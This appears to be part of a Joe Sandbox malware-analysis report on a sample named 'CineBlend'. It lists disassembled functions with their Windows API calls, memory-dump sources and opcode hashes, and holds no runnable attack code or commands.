Opcode ID: 825b234e8c28009d49c9e006e78b8bac22cb24401368ecd0783eef75cf6fabb2
Instruction ID: bb27c75aada52019551243de0e03619d6fdbad57795d06c5c679026b848214f0
Opcode Fuzzy Hash: 825b234e8c28009d49c9e006e78b8bac22cb24401368ecd0783eef75cf6fabb2
Instruction Fuzzy Hash: 44014FF69002087BE71197A48D89EE677ACD70C744F0045B1B705E7051EA749E848B75

Function 00BA1312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00BA1322
EnterCriticalSection.KERNEL32(00000000,?), ref: 00BA1334
TerminateThread.KERNEL32(00000000,000001F6), ref: 00BA1342
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00BA1350
CloseHandle.KERNEL32(00000000), ref: 00BA135F
InterlockedExchange.KERNEL32(?,000001F6), ref: 00BA136F
LeaveCriticalSection.KERNEL32(00000000), ref: 00BA1376

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 96240bdeb992f3a71b7398abac7f6e44db71adf74200e9b8d98c852557588a90
Instruction ID: 597406d6ffbb60c0bcdf1eb658f11d05ba163cfdeb8a83d8490e28e6a749cbe6
Opcode Fuzzy Hash: 96240bdeb992f3a71b7398abac7f6e44db71adf74200e9b8d98c852557588a90
Instruction Fuzzy Hash: 9BF0EC36046612BBD7415F54EE49FD6BB79FF49302F401531F102968A0CB749472CF94

Function 00BB26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BB281D
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BB283E
WSAGetLastError.WSOCK32 ref: 00BB284F
htons.WSOCK32(?,?,?,?,?), ref: 00BB2938
inet_ntoa.WSOCK32(?), ref: 00BB28E9

Part of subcall function 00B9433E: _strlen.LIBCMT ref: 00B94348

Part of subcall function 00BB3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00BAF669), ref: 00BB3C9D

_strlen.LIBCMT ref: 00BB2992

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: f42f68ebba10de3d5da2ab22f3507bf31679d50601195937dea6a8f6b7425aaa
Instruction ID: d52ada737355c95517ad2283753e804ea8815356f38d85f9c221006bf60aa6e6
Opcode Fuzzy Hash: f42f68ebba10de3d5da2ab22f3507bf31679d50601195937dea6a8f6b7425aaa
Instruction Fuzzy Hash: 75B1CF35604300AFD324DF24C885F6ABBE5EF84318F64899CF49A5B2A2DB71ED45CB91

Function 00B60527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00B6042A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B60446
__allrem.LIBCMT ref: 00B6045D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B6047B
__allrem.LIBCMT ref: 00B60492
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B604B0

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction ID: ae67b0e4ffa14f9efbff6e8f8becde8f13640724575abf8632081430cc4cea19
Opcode Fuzzy Hash: 675459f4f124bd2af17bf05e9c9e87198950a75667ee82f7844c946ca9c63f73
Instruction Fuzzy Hash: 4D81E472A107069BE720BF6ACC81B6B73F9EF54320F2445AAF515D7381EB78D9008794

Function 00B66571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B58649,00B58649,?,?,?,00B667C2,00000001,00000001,8BE85006), ref: 00B665CB
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B667C2,00000001,00000001,8BE85006,?,?,?), ref: 00B66651
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B6674B
__freea.LIBCMT ref: 00B66758

Part of subcall function 00B63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B50165,?,?,00BA11D9,0000FFFF), ref: 00B63BC5

__freea.LIBCMT ref: 00B66761
__freea.LIBCMT ref: 00B66786

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2e1e7f490cacaea6b61dfbe1d1dec74ed097c945d32b25e4ec50fdf0712a2e52
Instruction ID: 75204dd26683eb77f15308ff82fb5a799cf6d8d4082af9f174bbe839e483b118
Opcode Fuzzy Hash: 2e1e7f490cacaea6b61dfbe1d1dec74ed097c945d32b25e4ec50fdf0712a2e52
Instruction Fuzzy Hash: D151F47261021AAFEB258F64CC85EBB77EAEF44714F1546A9FC19D7140EB38EC50C6A0

Function 00BBC63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

Part of subcall function 00BBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BBC10E,?,?), ref: 00BBD415
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD451
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4C8
Part of subcall function 00BBD3F8: _wcslen.LIBCMT ref: 00BBD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BBC72A
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BBC785
RegCloseKey.ADVAPI32(00000000), ref: 00BBC7CA
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00BBC7F9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00BBC853
RegCloseKey.ADVAPI32(?), ref: 00BBC85F

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 2afcd8fb0535bd415ee8d7d7d67a6f911b476c17d01eb5571bcb6e6ad23b7578
Instruction ID: e2422e833c827788d49fab3ff64b4dd81f6c12368b105858bd1575446c596d5e
Opcode Fuzzy Hash: 2afcd8fb0535bd415ee8d7d7d67a6f911b476c17d01eb5571bcb6e6ad23b7578
Instruction Fuzzy Hash: E381AD75208241AFC714DF24C895E7ABBE5FF84308F1489ACF5598B2A2DB71ED05CB92

Function 00B9009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 00B900A9
SysAllocString.OLEAUT32(00000000), ref: 00B90150
VariantCopy.OLEAUT32(00B90354,00000000), ref: 00B90179
VariantClear.OLEAUT32(00B90354), ref: 00B9019D
VariantCopy.OLEAUT32(00B90354,00000000), ref: 00B901A1
VariantClear.OLEAUT32(?), ref: 00B901AB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 0e710c87f7ff34997ab21ff26cafaf73524efaf010880277654a103940431ae5
Instruction ID: 172a6a30555c1adaf9f6cbd42d0c715f9e2d392b74062a8a3a371e53d7e4274a
Opcode Fuzzy Hash: 0e710c87f7ff34997ab21ff26cafaf73524efaf010880277654a103940431ae5
Instruction Fuzzy Hash: 3F51C535620314AECF24BB6498C9B29B3E5EF55310F2484E6F906EF296DB709C44CB56

Function 00BA9B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00B341EA: _wcslen.LIBCMT ref: 00B341EF

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

GetOpenFileNameW.COMDLG32(00000058), ref: 00BA9F2A
_wcslen.LIBCMT ref: 00BA9F4B
_wcslen.LIBCMT ref: 00BA9F72
GetSaveFileNameW.COMDLG32(00000058), ref: 00BA9FCA

Strings

X, xrefs: 00BA9E57

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 7d5f5f3462ff0711082a4d738e1538b957191cb141f1427ed3a7bd1210a299ef
Instruction ID: 9a6ac2cc657f36663f120aabd25516553c2b7b0944de8ec11ad381a28e6615d9
Opcode Fuzzy Hash: 7d5f5f3462ff0711082a4d738e1538b957191cb141f1427ed3a7bd1210a299ef
Instruction Fuzzy Hash: 89E171315083409FD724EF24C881B6AB7E5FF85314F1489ADF9899B2A2DB31ED45CB92

Function 00BA6ED3 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BA6F21
CoInitialize.OLE32(00000000), ref: 00BA707E
CoCreateInstance.OLE32(00BD0CC4,00000000,00000001,00BD0B34,?), ref: 00BA7095
CoUninitialize.OLE32 ref: 00BA7319

Strings

.lnk, xrefs: 00BA6EFF, 00BA6F69, 00BA7025

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 101563ae050cdb73dc73832e576737b8dfb29c99eee00564bdd247dc99bcbcd4
Instruction ID: 064fbab18f118ba567c39edbc9eea61f4b5a36a2623e0cffa2f65a6ec80e2a7e
Opcode Fuzzy Hash: 101563ae050cdb73dc73832e576737b8dfb29c99eee00564bdd247dc99bcbcd4
Instruction Fuzzy Hash: 06D13871508301AFC314EF24C881E6BB7E8FF99704F5049ADF5958B2A2DB71E949CB92

Function 00B31B00 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

BeginPaint.USER32(?,?,?), ref: 00B31B35
GetWindowRect.USER32(?,?), ref: 00B31B99
ScreenToClient.USER32(?,?), ref: 00B31BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B31BC7
EndPaint.USER32(?,?,?,?,?), ref: 00B31C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B73287

Part of subcall function 00B31C2D: BeginPath.GDI32(00000000), ref: 00B31C4B

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 4dac0f1ba88a949770e63ec209f184c4b71934dc7f3d0a30a7c944a8d5c8ca14
Instruction ID: 11b47c419384139b29188c10a9ad8b3066268a2728c323c50ccfa6ab8b3c11b6
Opcode Fuzzy Hash: 4dac0f1ba88a949770e63ec209f184c4b71934dc7f3d0a30a7c944a8d5c8ca14
Instruction Fuzzy Hash: D841B370105300AFDB10DF18DC89F7A7BE8EB49724F140AA9F9698B2A1C7319945DB61

Function 00BC8C36 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B8FBEF,00000000,?,?,00000000,?,00B739E2,00000004,00000000,00000000), ref: 00BC8CA7
EnableWindow.USER32(?,00000000), ref: 00BC8CCD
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BC8D2C
ShowWindow.USER32(?,00000004), ref: 00BC8D40
EnableWindow.USER32(?,00000001), ref: 00BC8D66
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BC8D8A

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: d98c15d4c090936661811a28c31191f2d40bb2a22a5e3a6f2f2a55f009b91fb2
Instruction ID: a3e6f8d5f566379c7e5b2465a608c47fc988f80ffc936f6100cbcb567e87668b
Opcode Fuzzy Hash: d98c15d4c090936661811a28c31191f2d40bb2a22a5e3a6f2f2a55f009b91fb2
Instruction Fuzzy Hash: 47416134602244AFDB25DF24D889FA67BF1FB49315F1940FEE5195B2A2CB31A845CB60

Function 00BB2D37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 00BB2D45

Part of subcall function 00BAEF33: GetWindowRect.USER32(?,?), ref: 00BAEF4B

GetDesktopWindow.USER32 ref: 00BB2D6F
GetWindowRect.USER32(00000000), ref: 00BB2D76
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00BB2DB2
GetCursorPos.USER32(?), ref: 00BB2DDE
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00BB2E3C

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: a72394858529c87c410a9f4978e1d38d807b3819a06cc360abb07a602096a6a5
Instruction ID: 0ecac24b95611d7501b48e5d99ddb2278732ed0c608ecb6970641e2074611fff
Opcode Fuzzy Hash: a72394858529c87c410a9f4978e1d38d807b3819a06cc360abb07a602096a6a5
Instruction Fuzzy Hash: 0331D072505316AFC720DF14D845FABB7E9FB88354F00092AF89997181DA70E909CB92

Function 00B955E1 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B955F9
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B95616
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B9564E
_wcslen.LIBCMT ref: 00B9566C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B95674
_wcsstr.LIBVCRUNTIME ref: 00B9567E

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: adc9ff9a15aaf9d46a7f58edd7b673f9acab37e7ee9ea6cb50433e842ddf7c49
Instruction ID: da63c56a4e0bb061ee62bb04b5c31663334718f7ef6a0f01afc300803b3a16de
Opcode Fuzzy Hash: adc9ff9a15aaf9d46a7f58edd7b673f9acab37e7ee9ea6cb50433e842ddf7c49
Instruction Fuzzy Hash: 6621D4322446047BEF265B259C49F7B7BE8DF49750F1440B9F805DA091EE71DC419760

Function 00BA6263 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B35851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B355D1,?,?,00B74B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00B35871

_wcslen.LIBCMT ref: 00BA62C0
CoInitialize.OLE32(00000000), ref: 00BA63DA
CoCreateInstance.OLE32(00BD0CC4,00000000,00000001,00BD0B34,?), ref: 00BA63F3
CoUninitialize.OLE32 ref: 00BA6411

Strings

.lnk, xrefs: 00BA62BB, 00BA6306, 00BA63CA

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 6adfb00231563e96948d1e91cc3886974ce66d83ebffb44c8ff57e328f8b5943
Instruction ID: e962f8e7e55488fedd982c7072f9174110bdbfcee55b934e4ed5cc54310044a5
Opcode Fuzzy Hash: 6adfb00231563e96948d1e91cc3886974ce66d83ebffb44c8ff57e328f8b5943
Instruction Fuzzy Hash: 9DD126B5A083119FCB14DF18C484A2AB7F5EF8A714F18899DF8859B361DB31EC45CB92

Function 00BC86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00BC8740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00BC8765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00BC877D
GetSystemMetrics.USER32(00000004), ref: 00BC87A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00BAC1F2,00000000), ref: 00BC87C6

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

GetSystemMetrics.USER32(00000004), ref: 00BC87B1

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 8cffa8e9432830e7891d87e434d8a3323b9e2a2eb22afb92c7eb6b07d33a8121
Instruction ID: 05f04d7543ebafbac50083fde523b1afd1c6f67e63989239b982e86a57154ac3
Opcode Fuzzy Hash: 8cffa8e9432830e7891d87e434d8a3323b9e2a2eb22afb92c7eb6b07d33a8121
Instruction Fuzzy Hash: BE214A75611241AFCB149F38CC48F6A3BE6EB89365F25467EA926C71E0EE308C50CB10

Function 00B536F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B536E9,00B53355), ref: 00B53700
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B5370E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B53727
SetLastError.KERNEL32(00000000,?,00B536E9,00B53355), ref: 00B53779

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: bf58a819a22758cad2c788dcba4f241baa1564cee2a20b80edb7e6f173771184
Instruction ID: f5b904240d5268d59c439f9c0e62a004fc81134c958e60606f1e0334583d485a
Opcode Fuzzy Hash: bf58a819a22758cad2c788dcba4f241baa1564cee2a20b80edb7e6f173771184
Instruction Fuzzy Hash: 19012DB6A0D7112EA62517746CD5F7A26D5D70DFF3B2002F9F810432F0EF514D0AA144

Function 00B630E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B62908,00BF9B48,0000000C,00B53268,00000001,?,?), ref: 00B630EB
_free.LIBCMT ref: 00B6311E
_free.LIBCMT ref: 00B63146
SetLastError.KERNEL32(00000000), ref: 00B63153
SetLastError.KERNEL32(00000000), ref: 00B6315F
_abort.LIBCMT ref: 00B63165

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
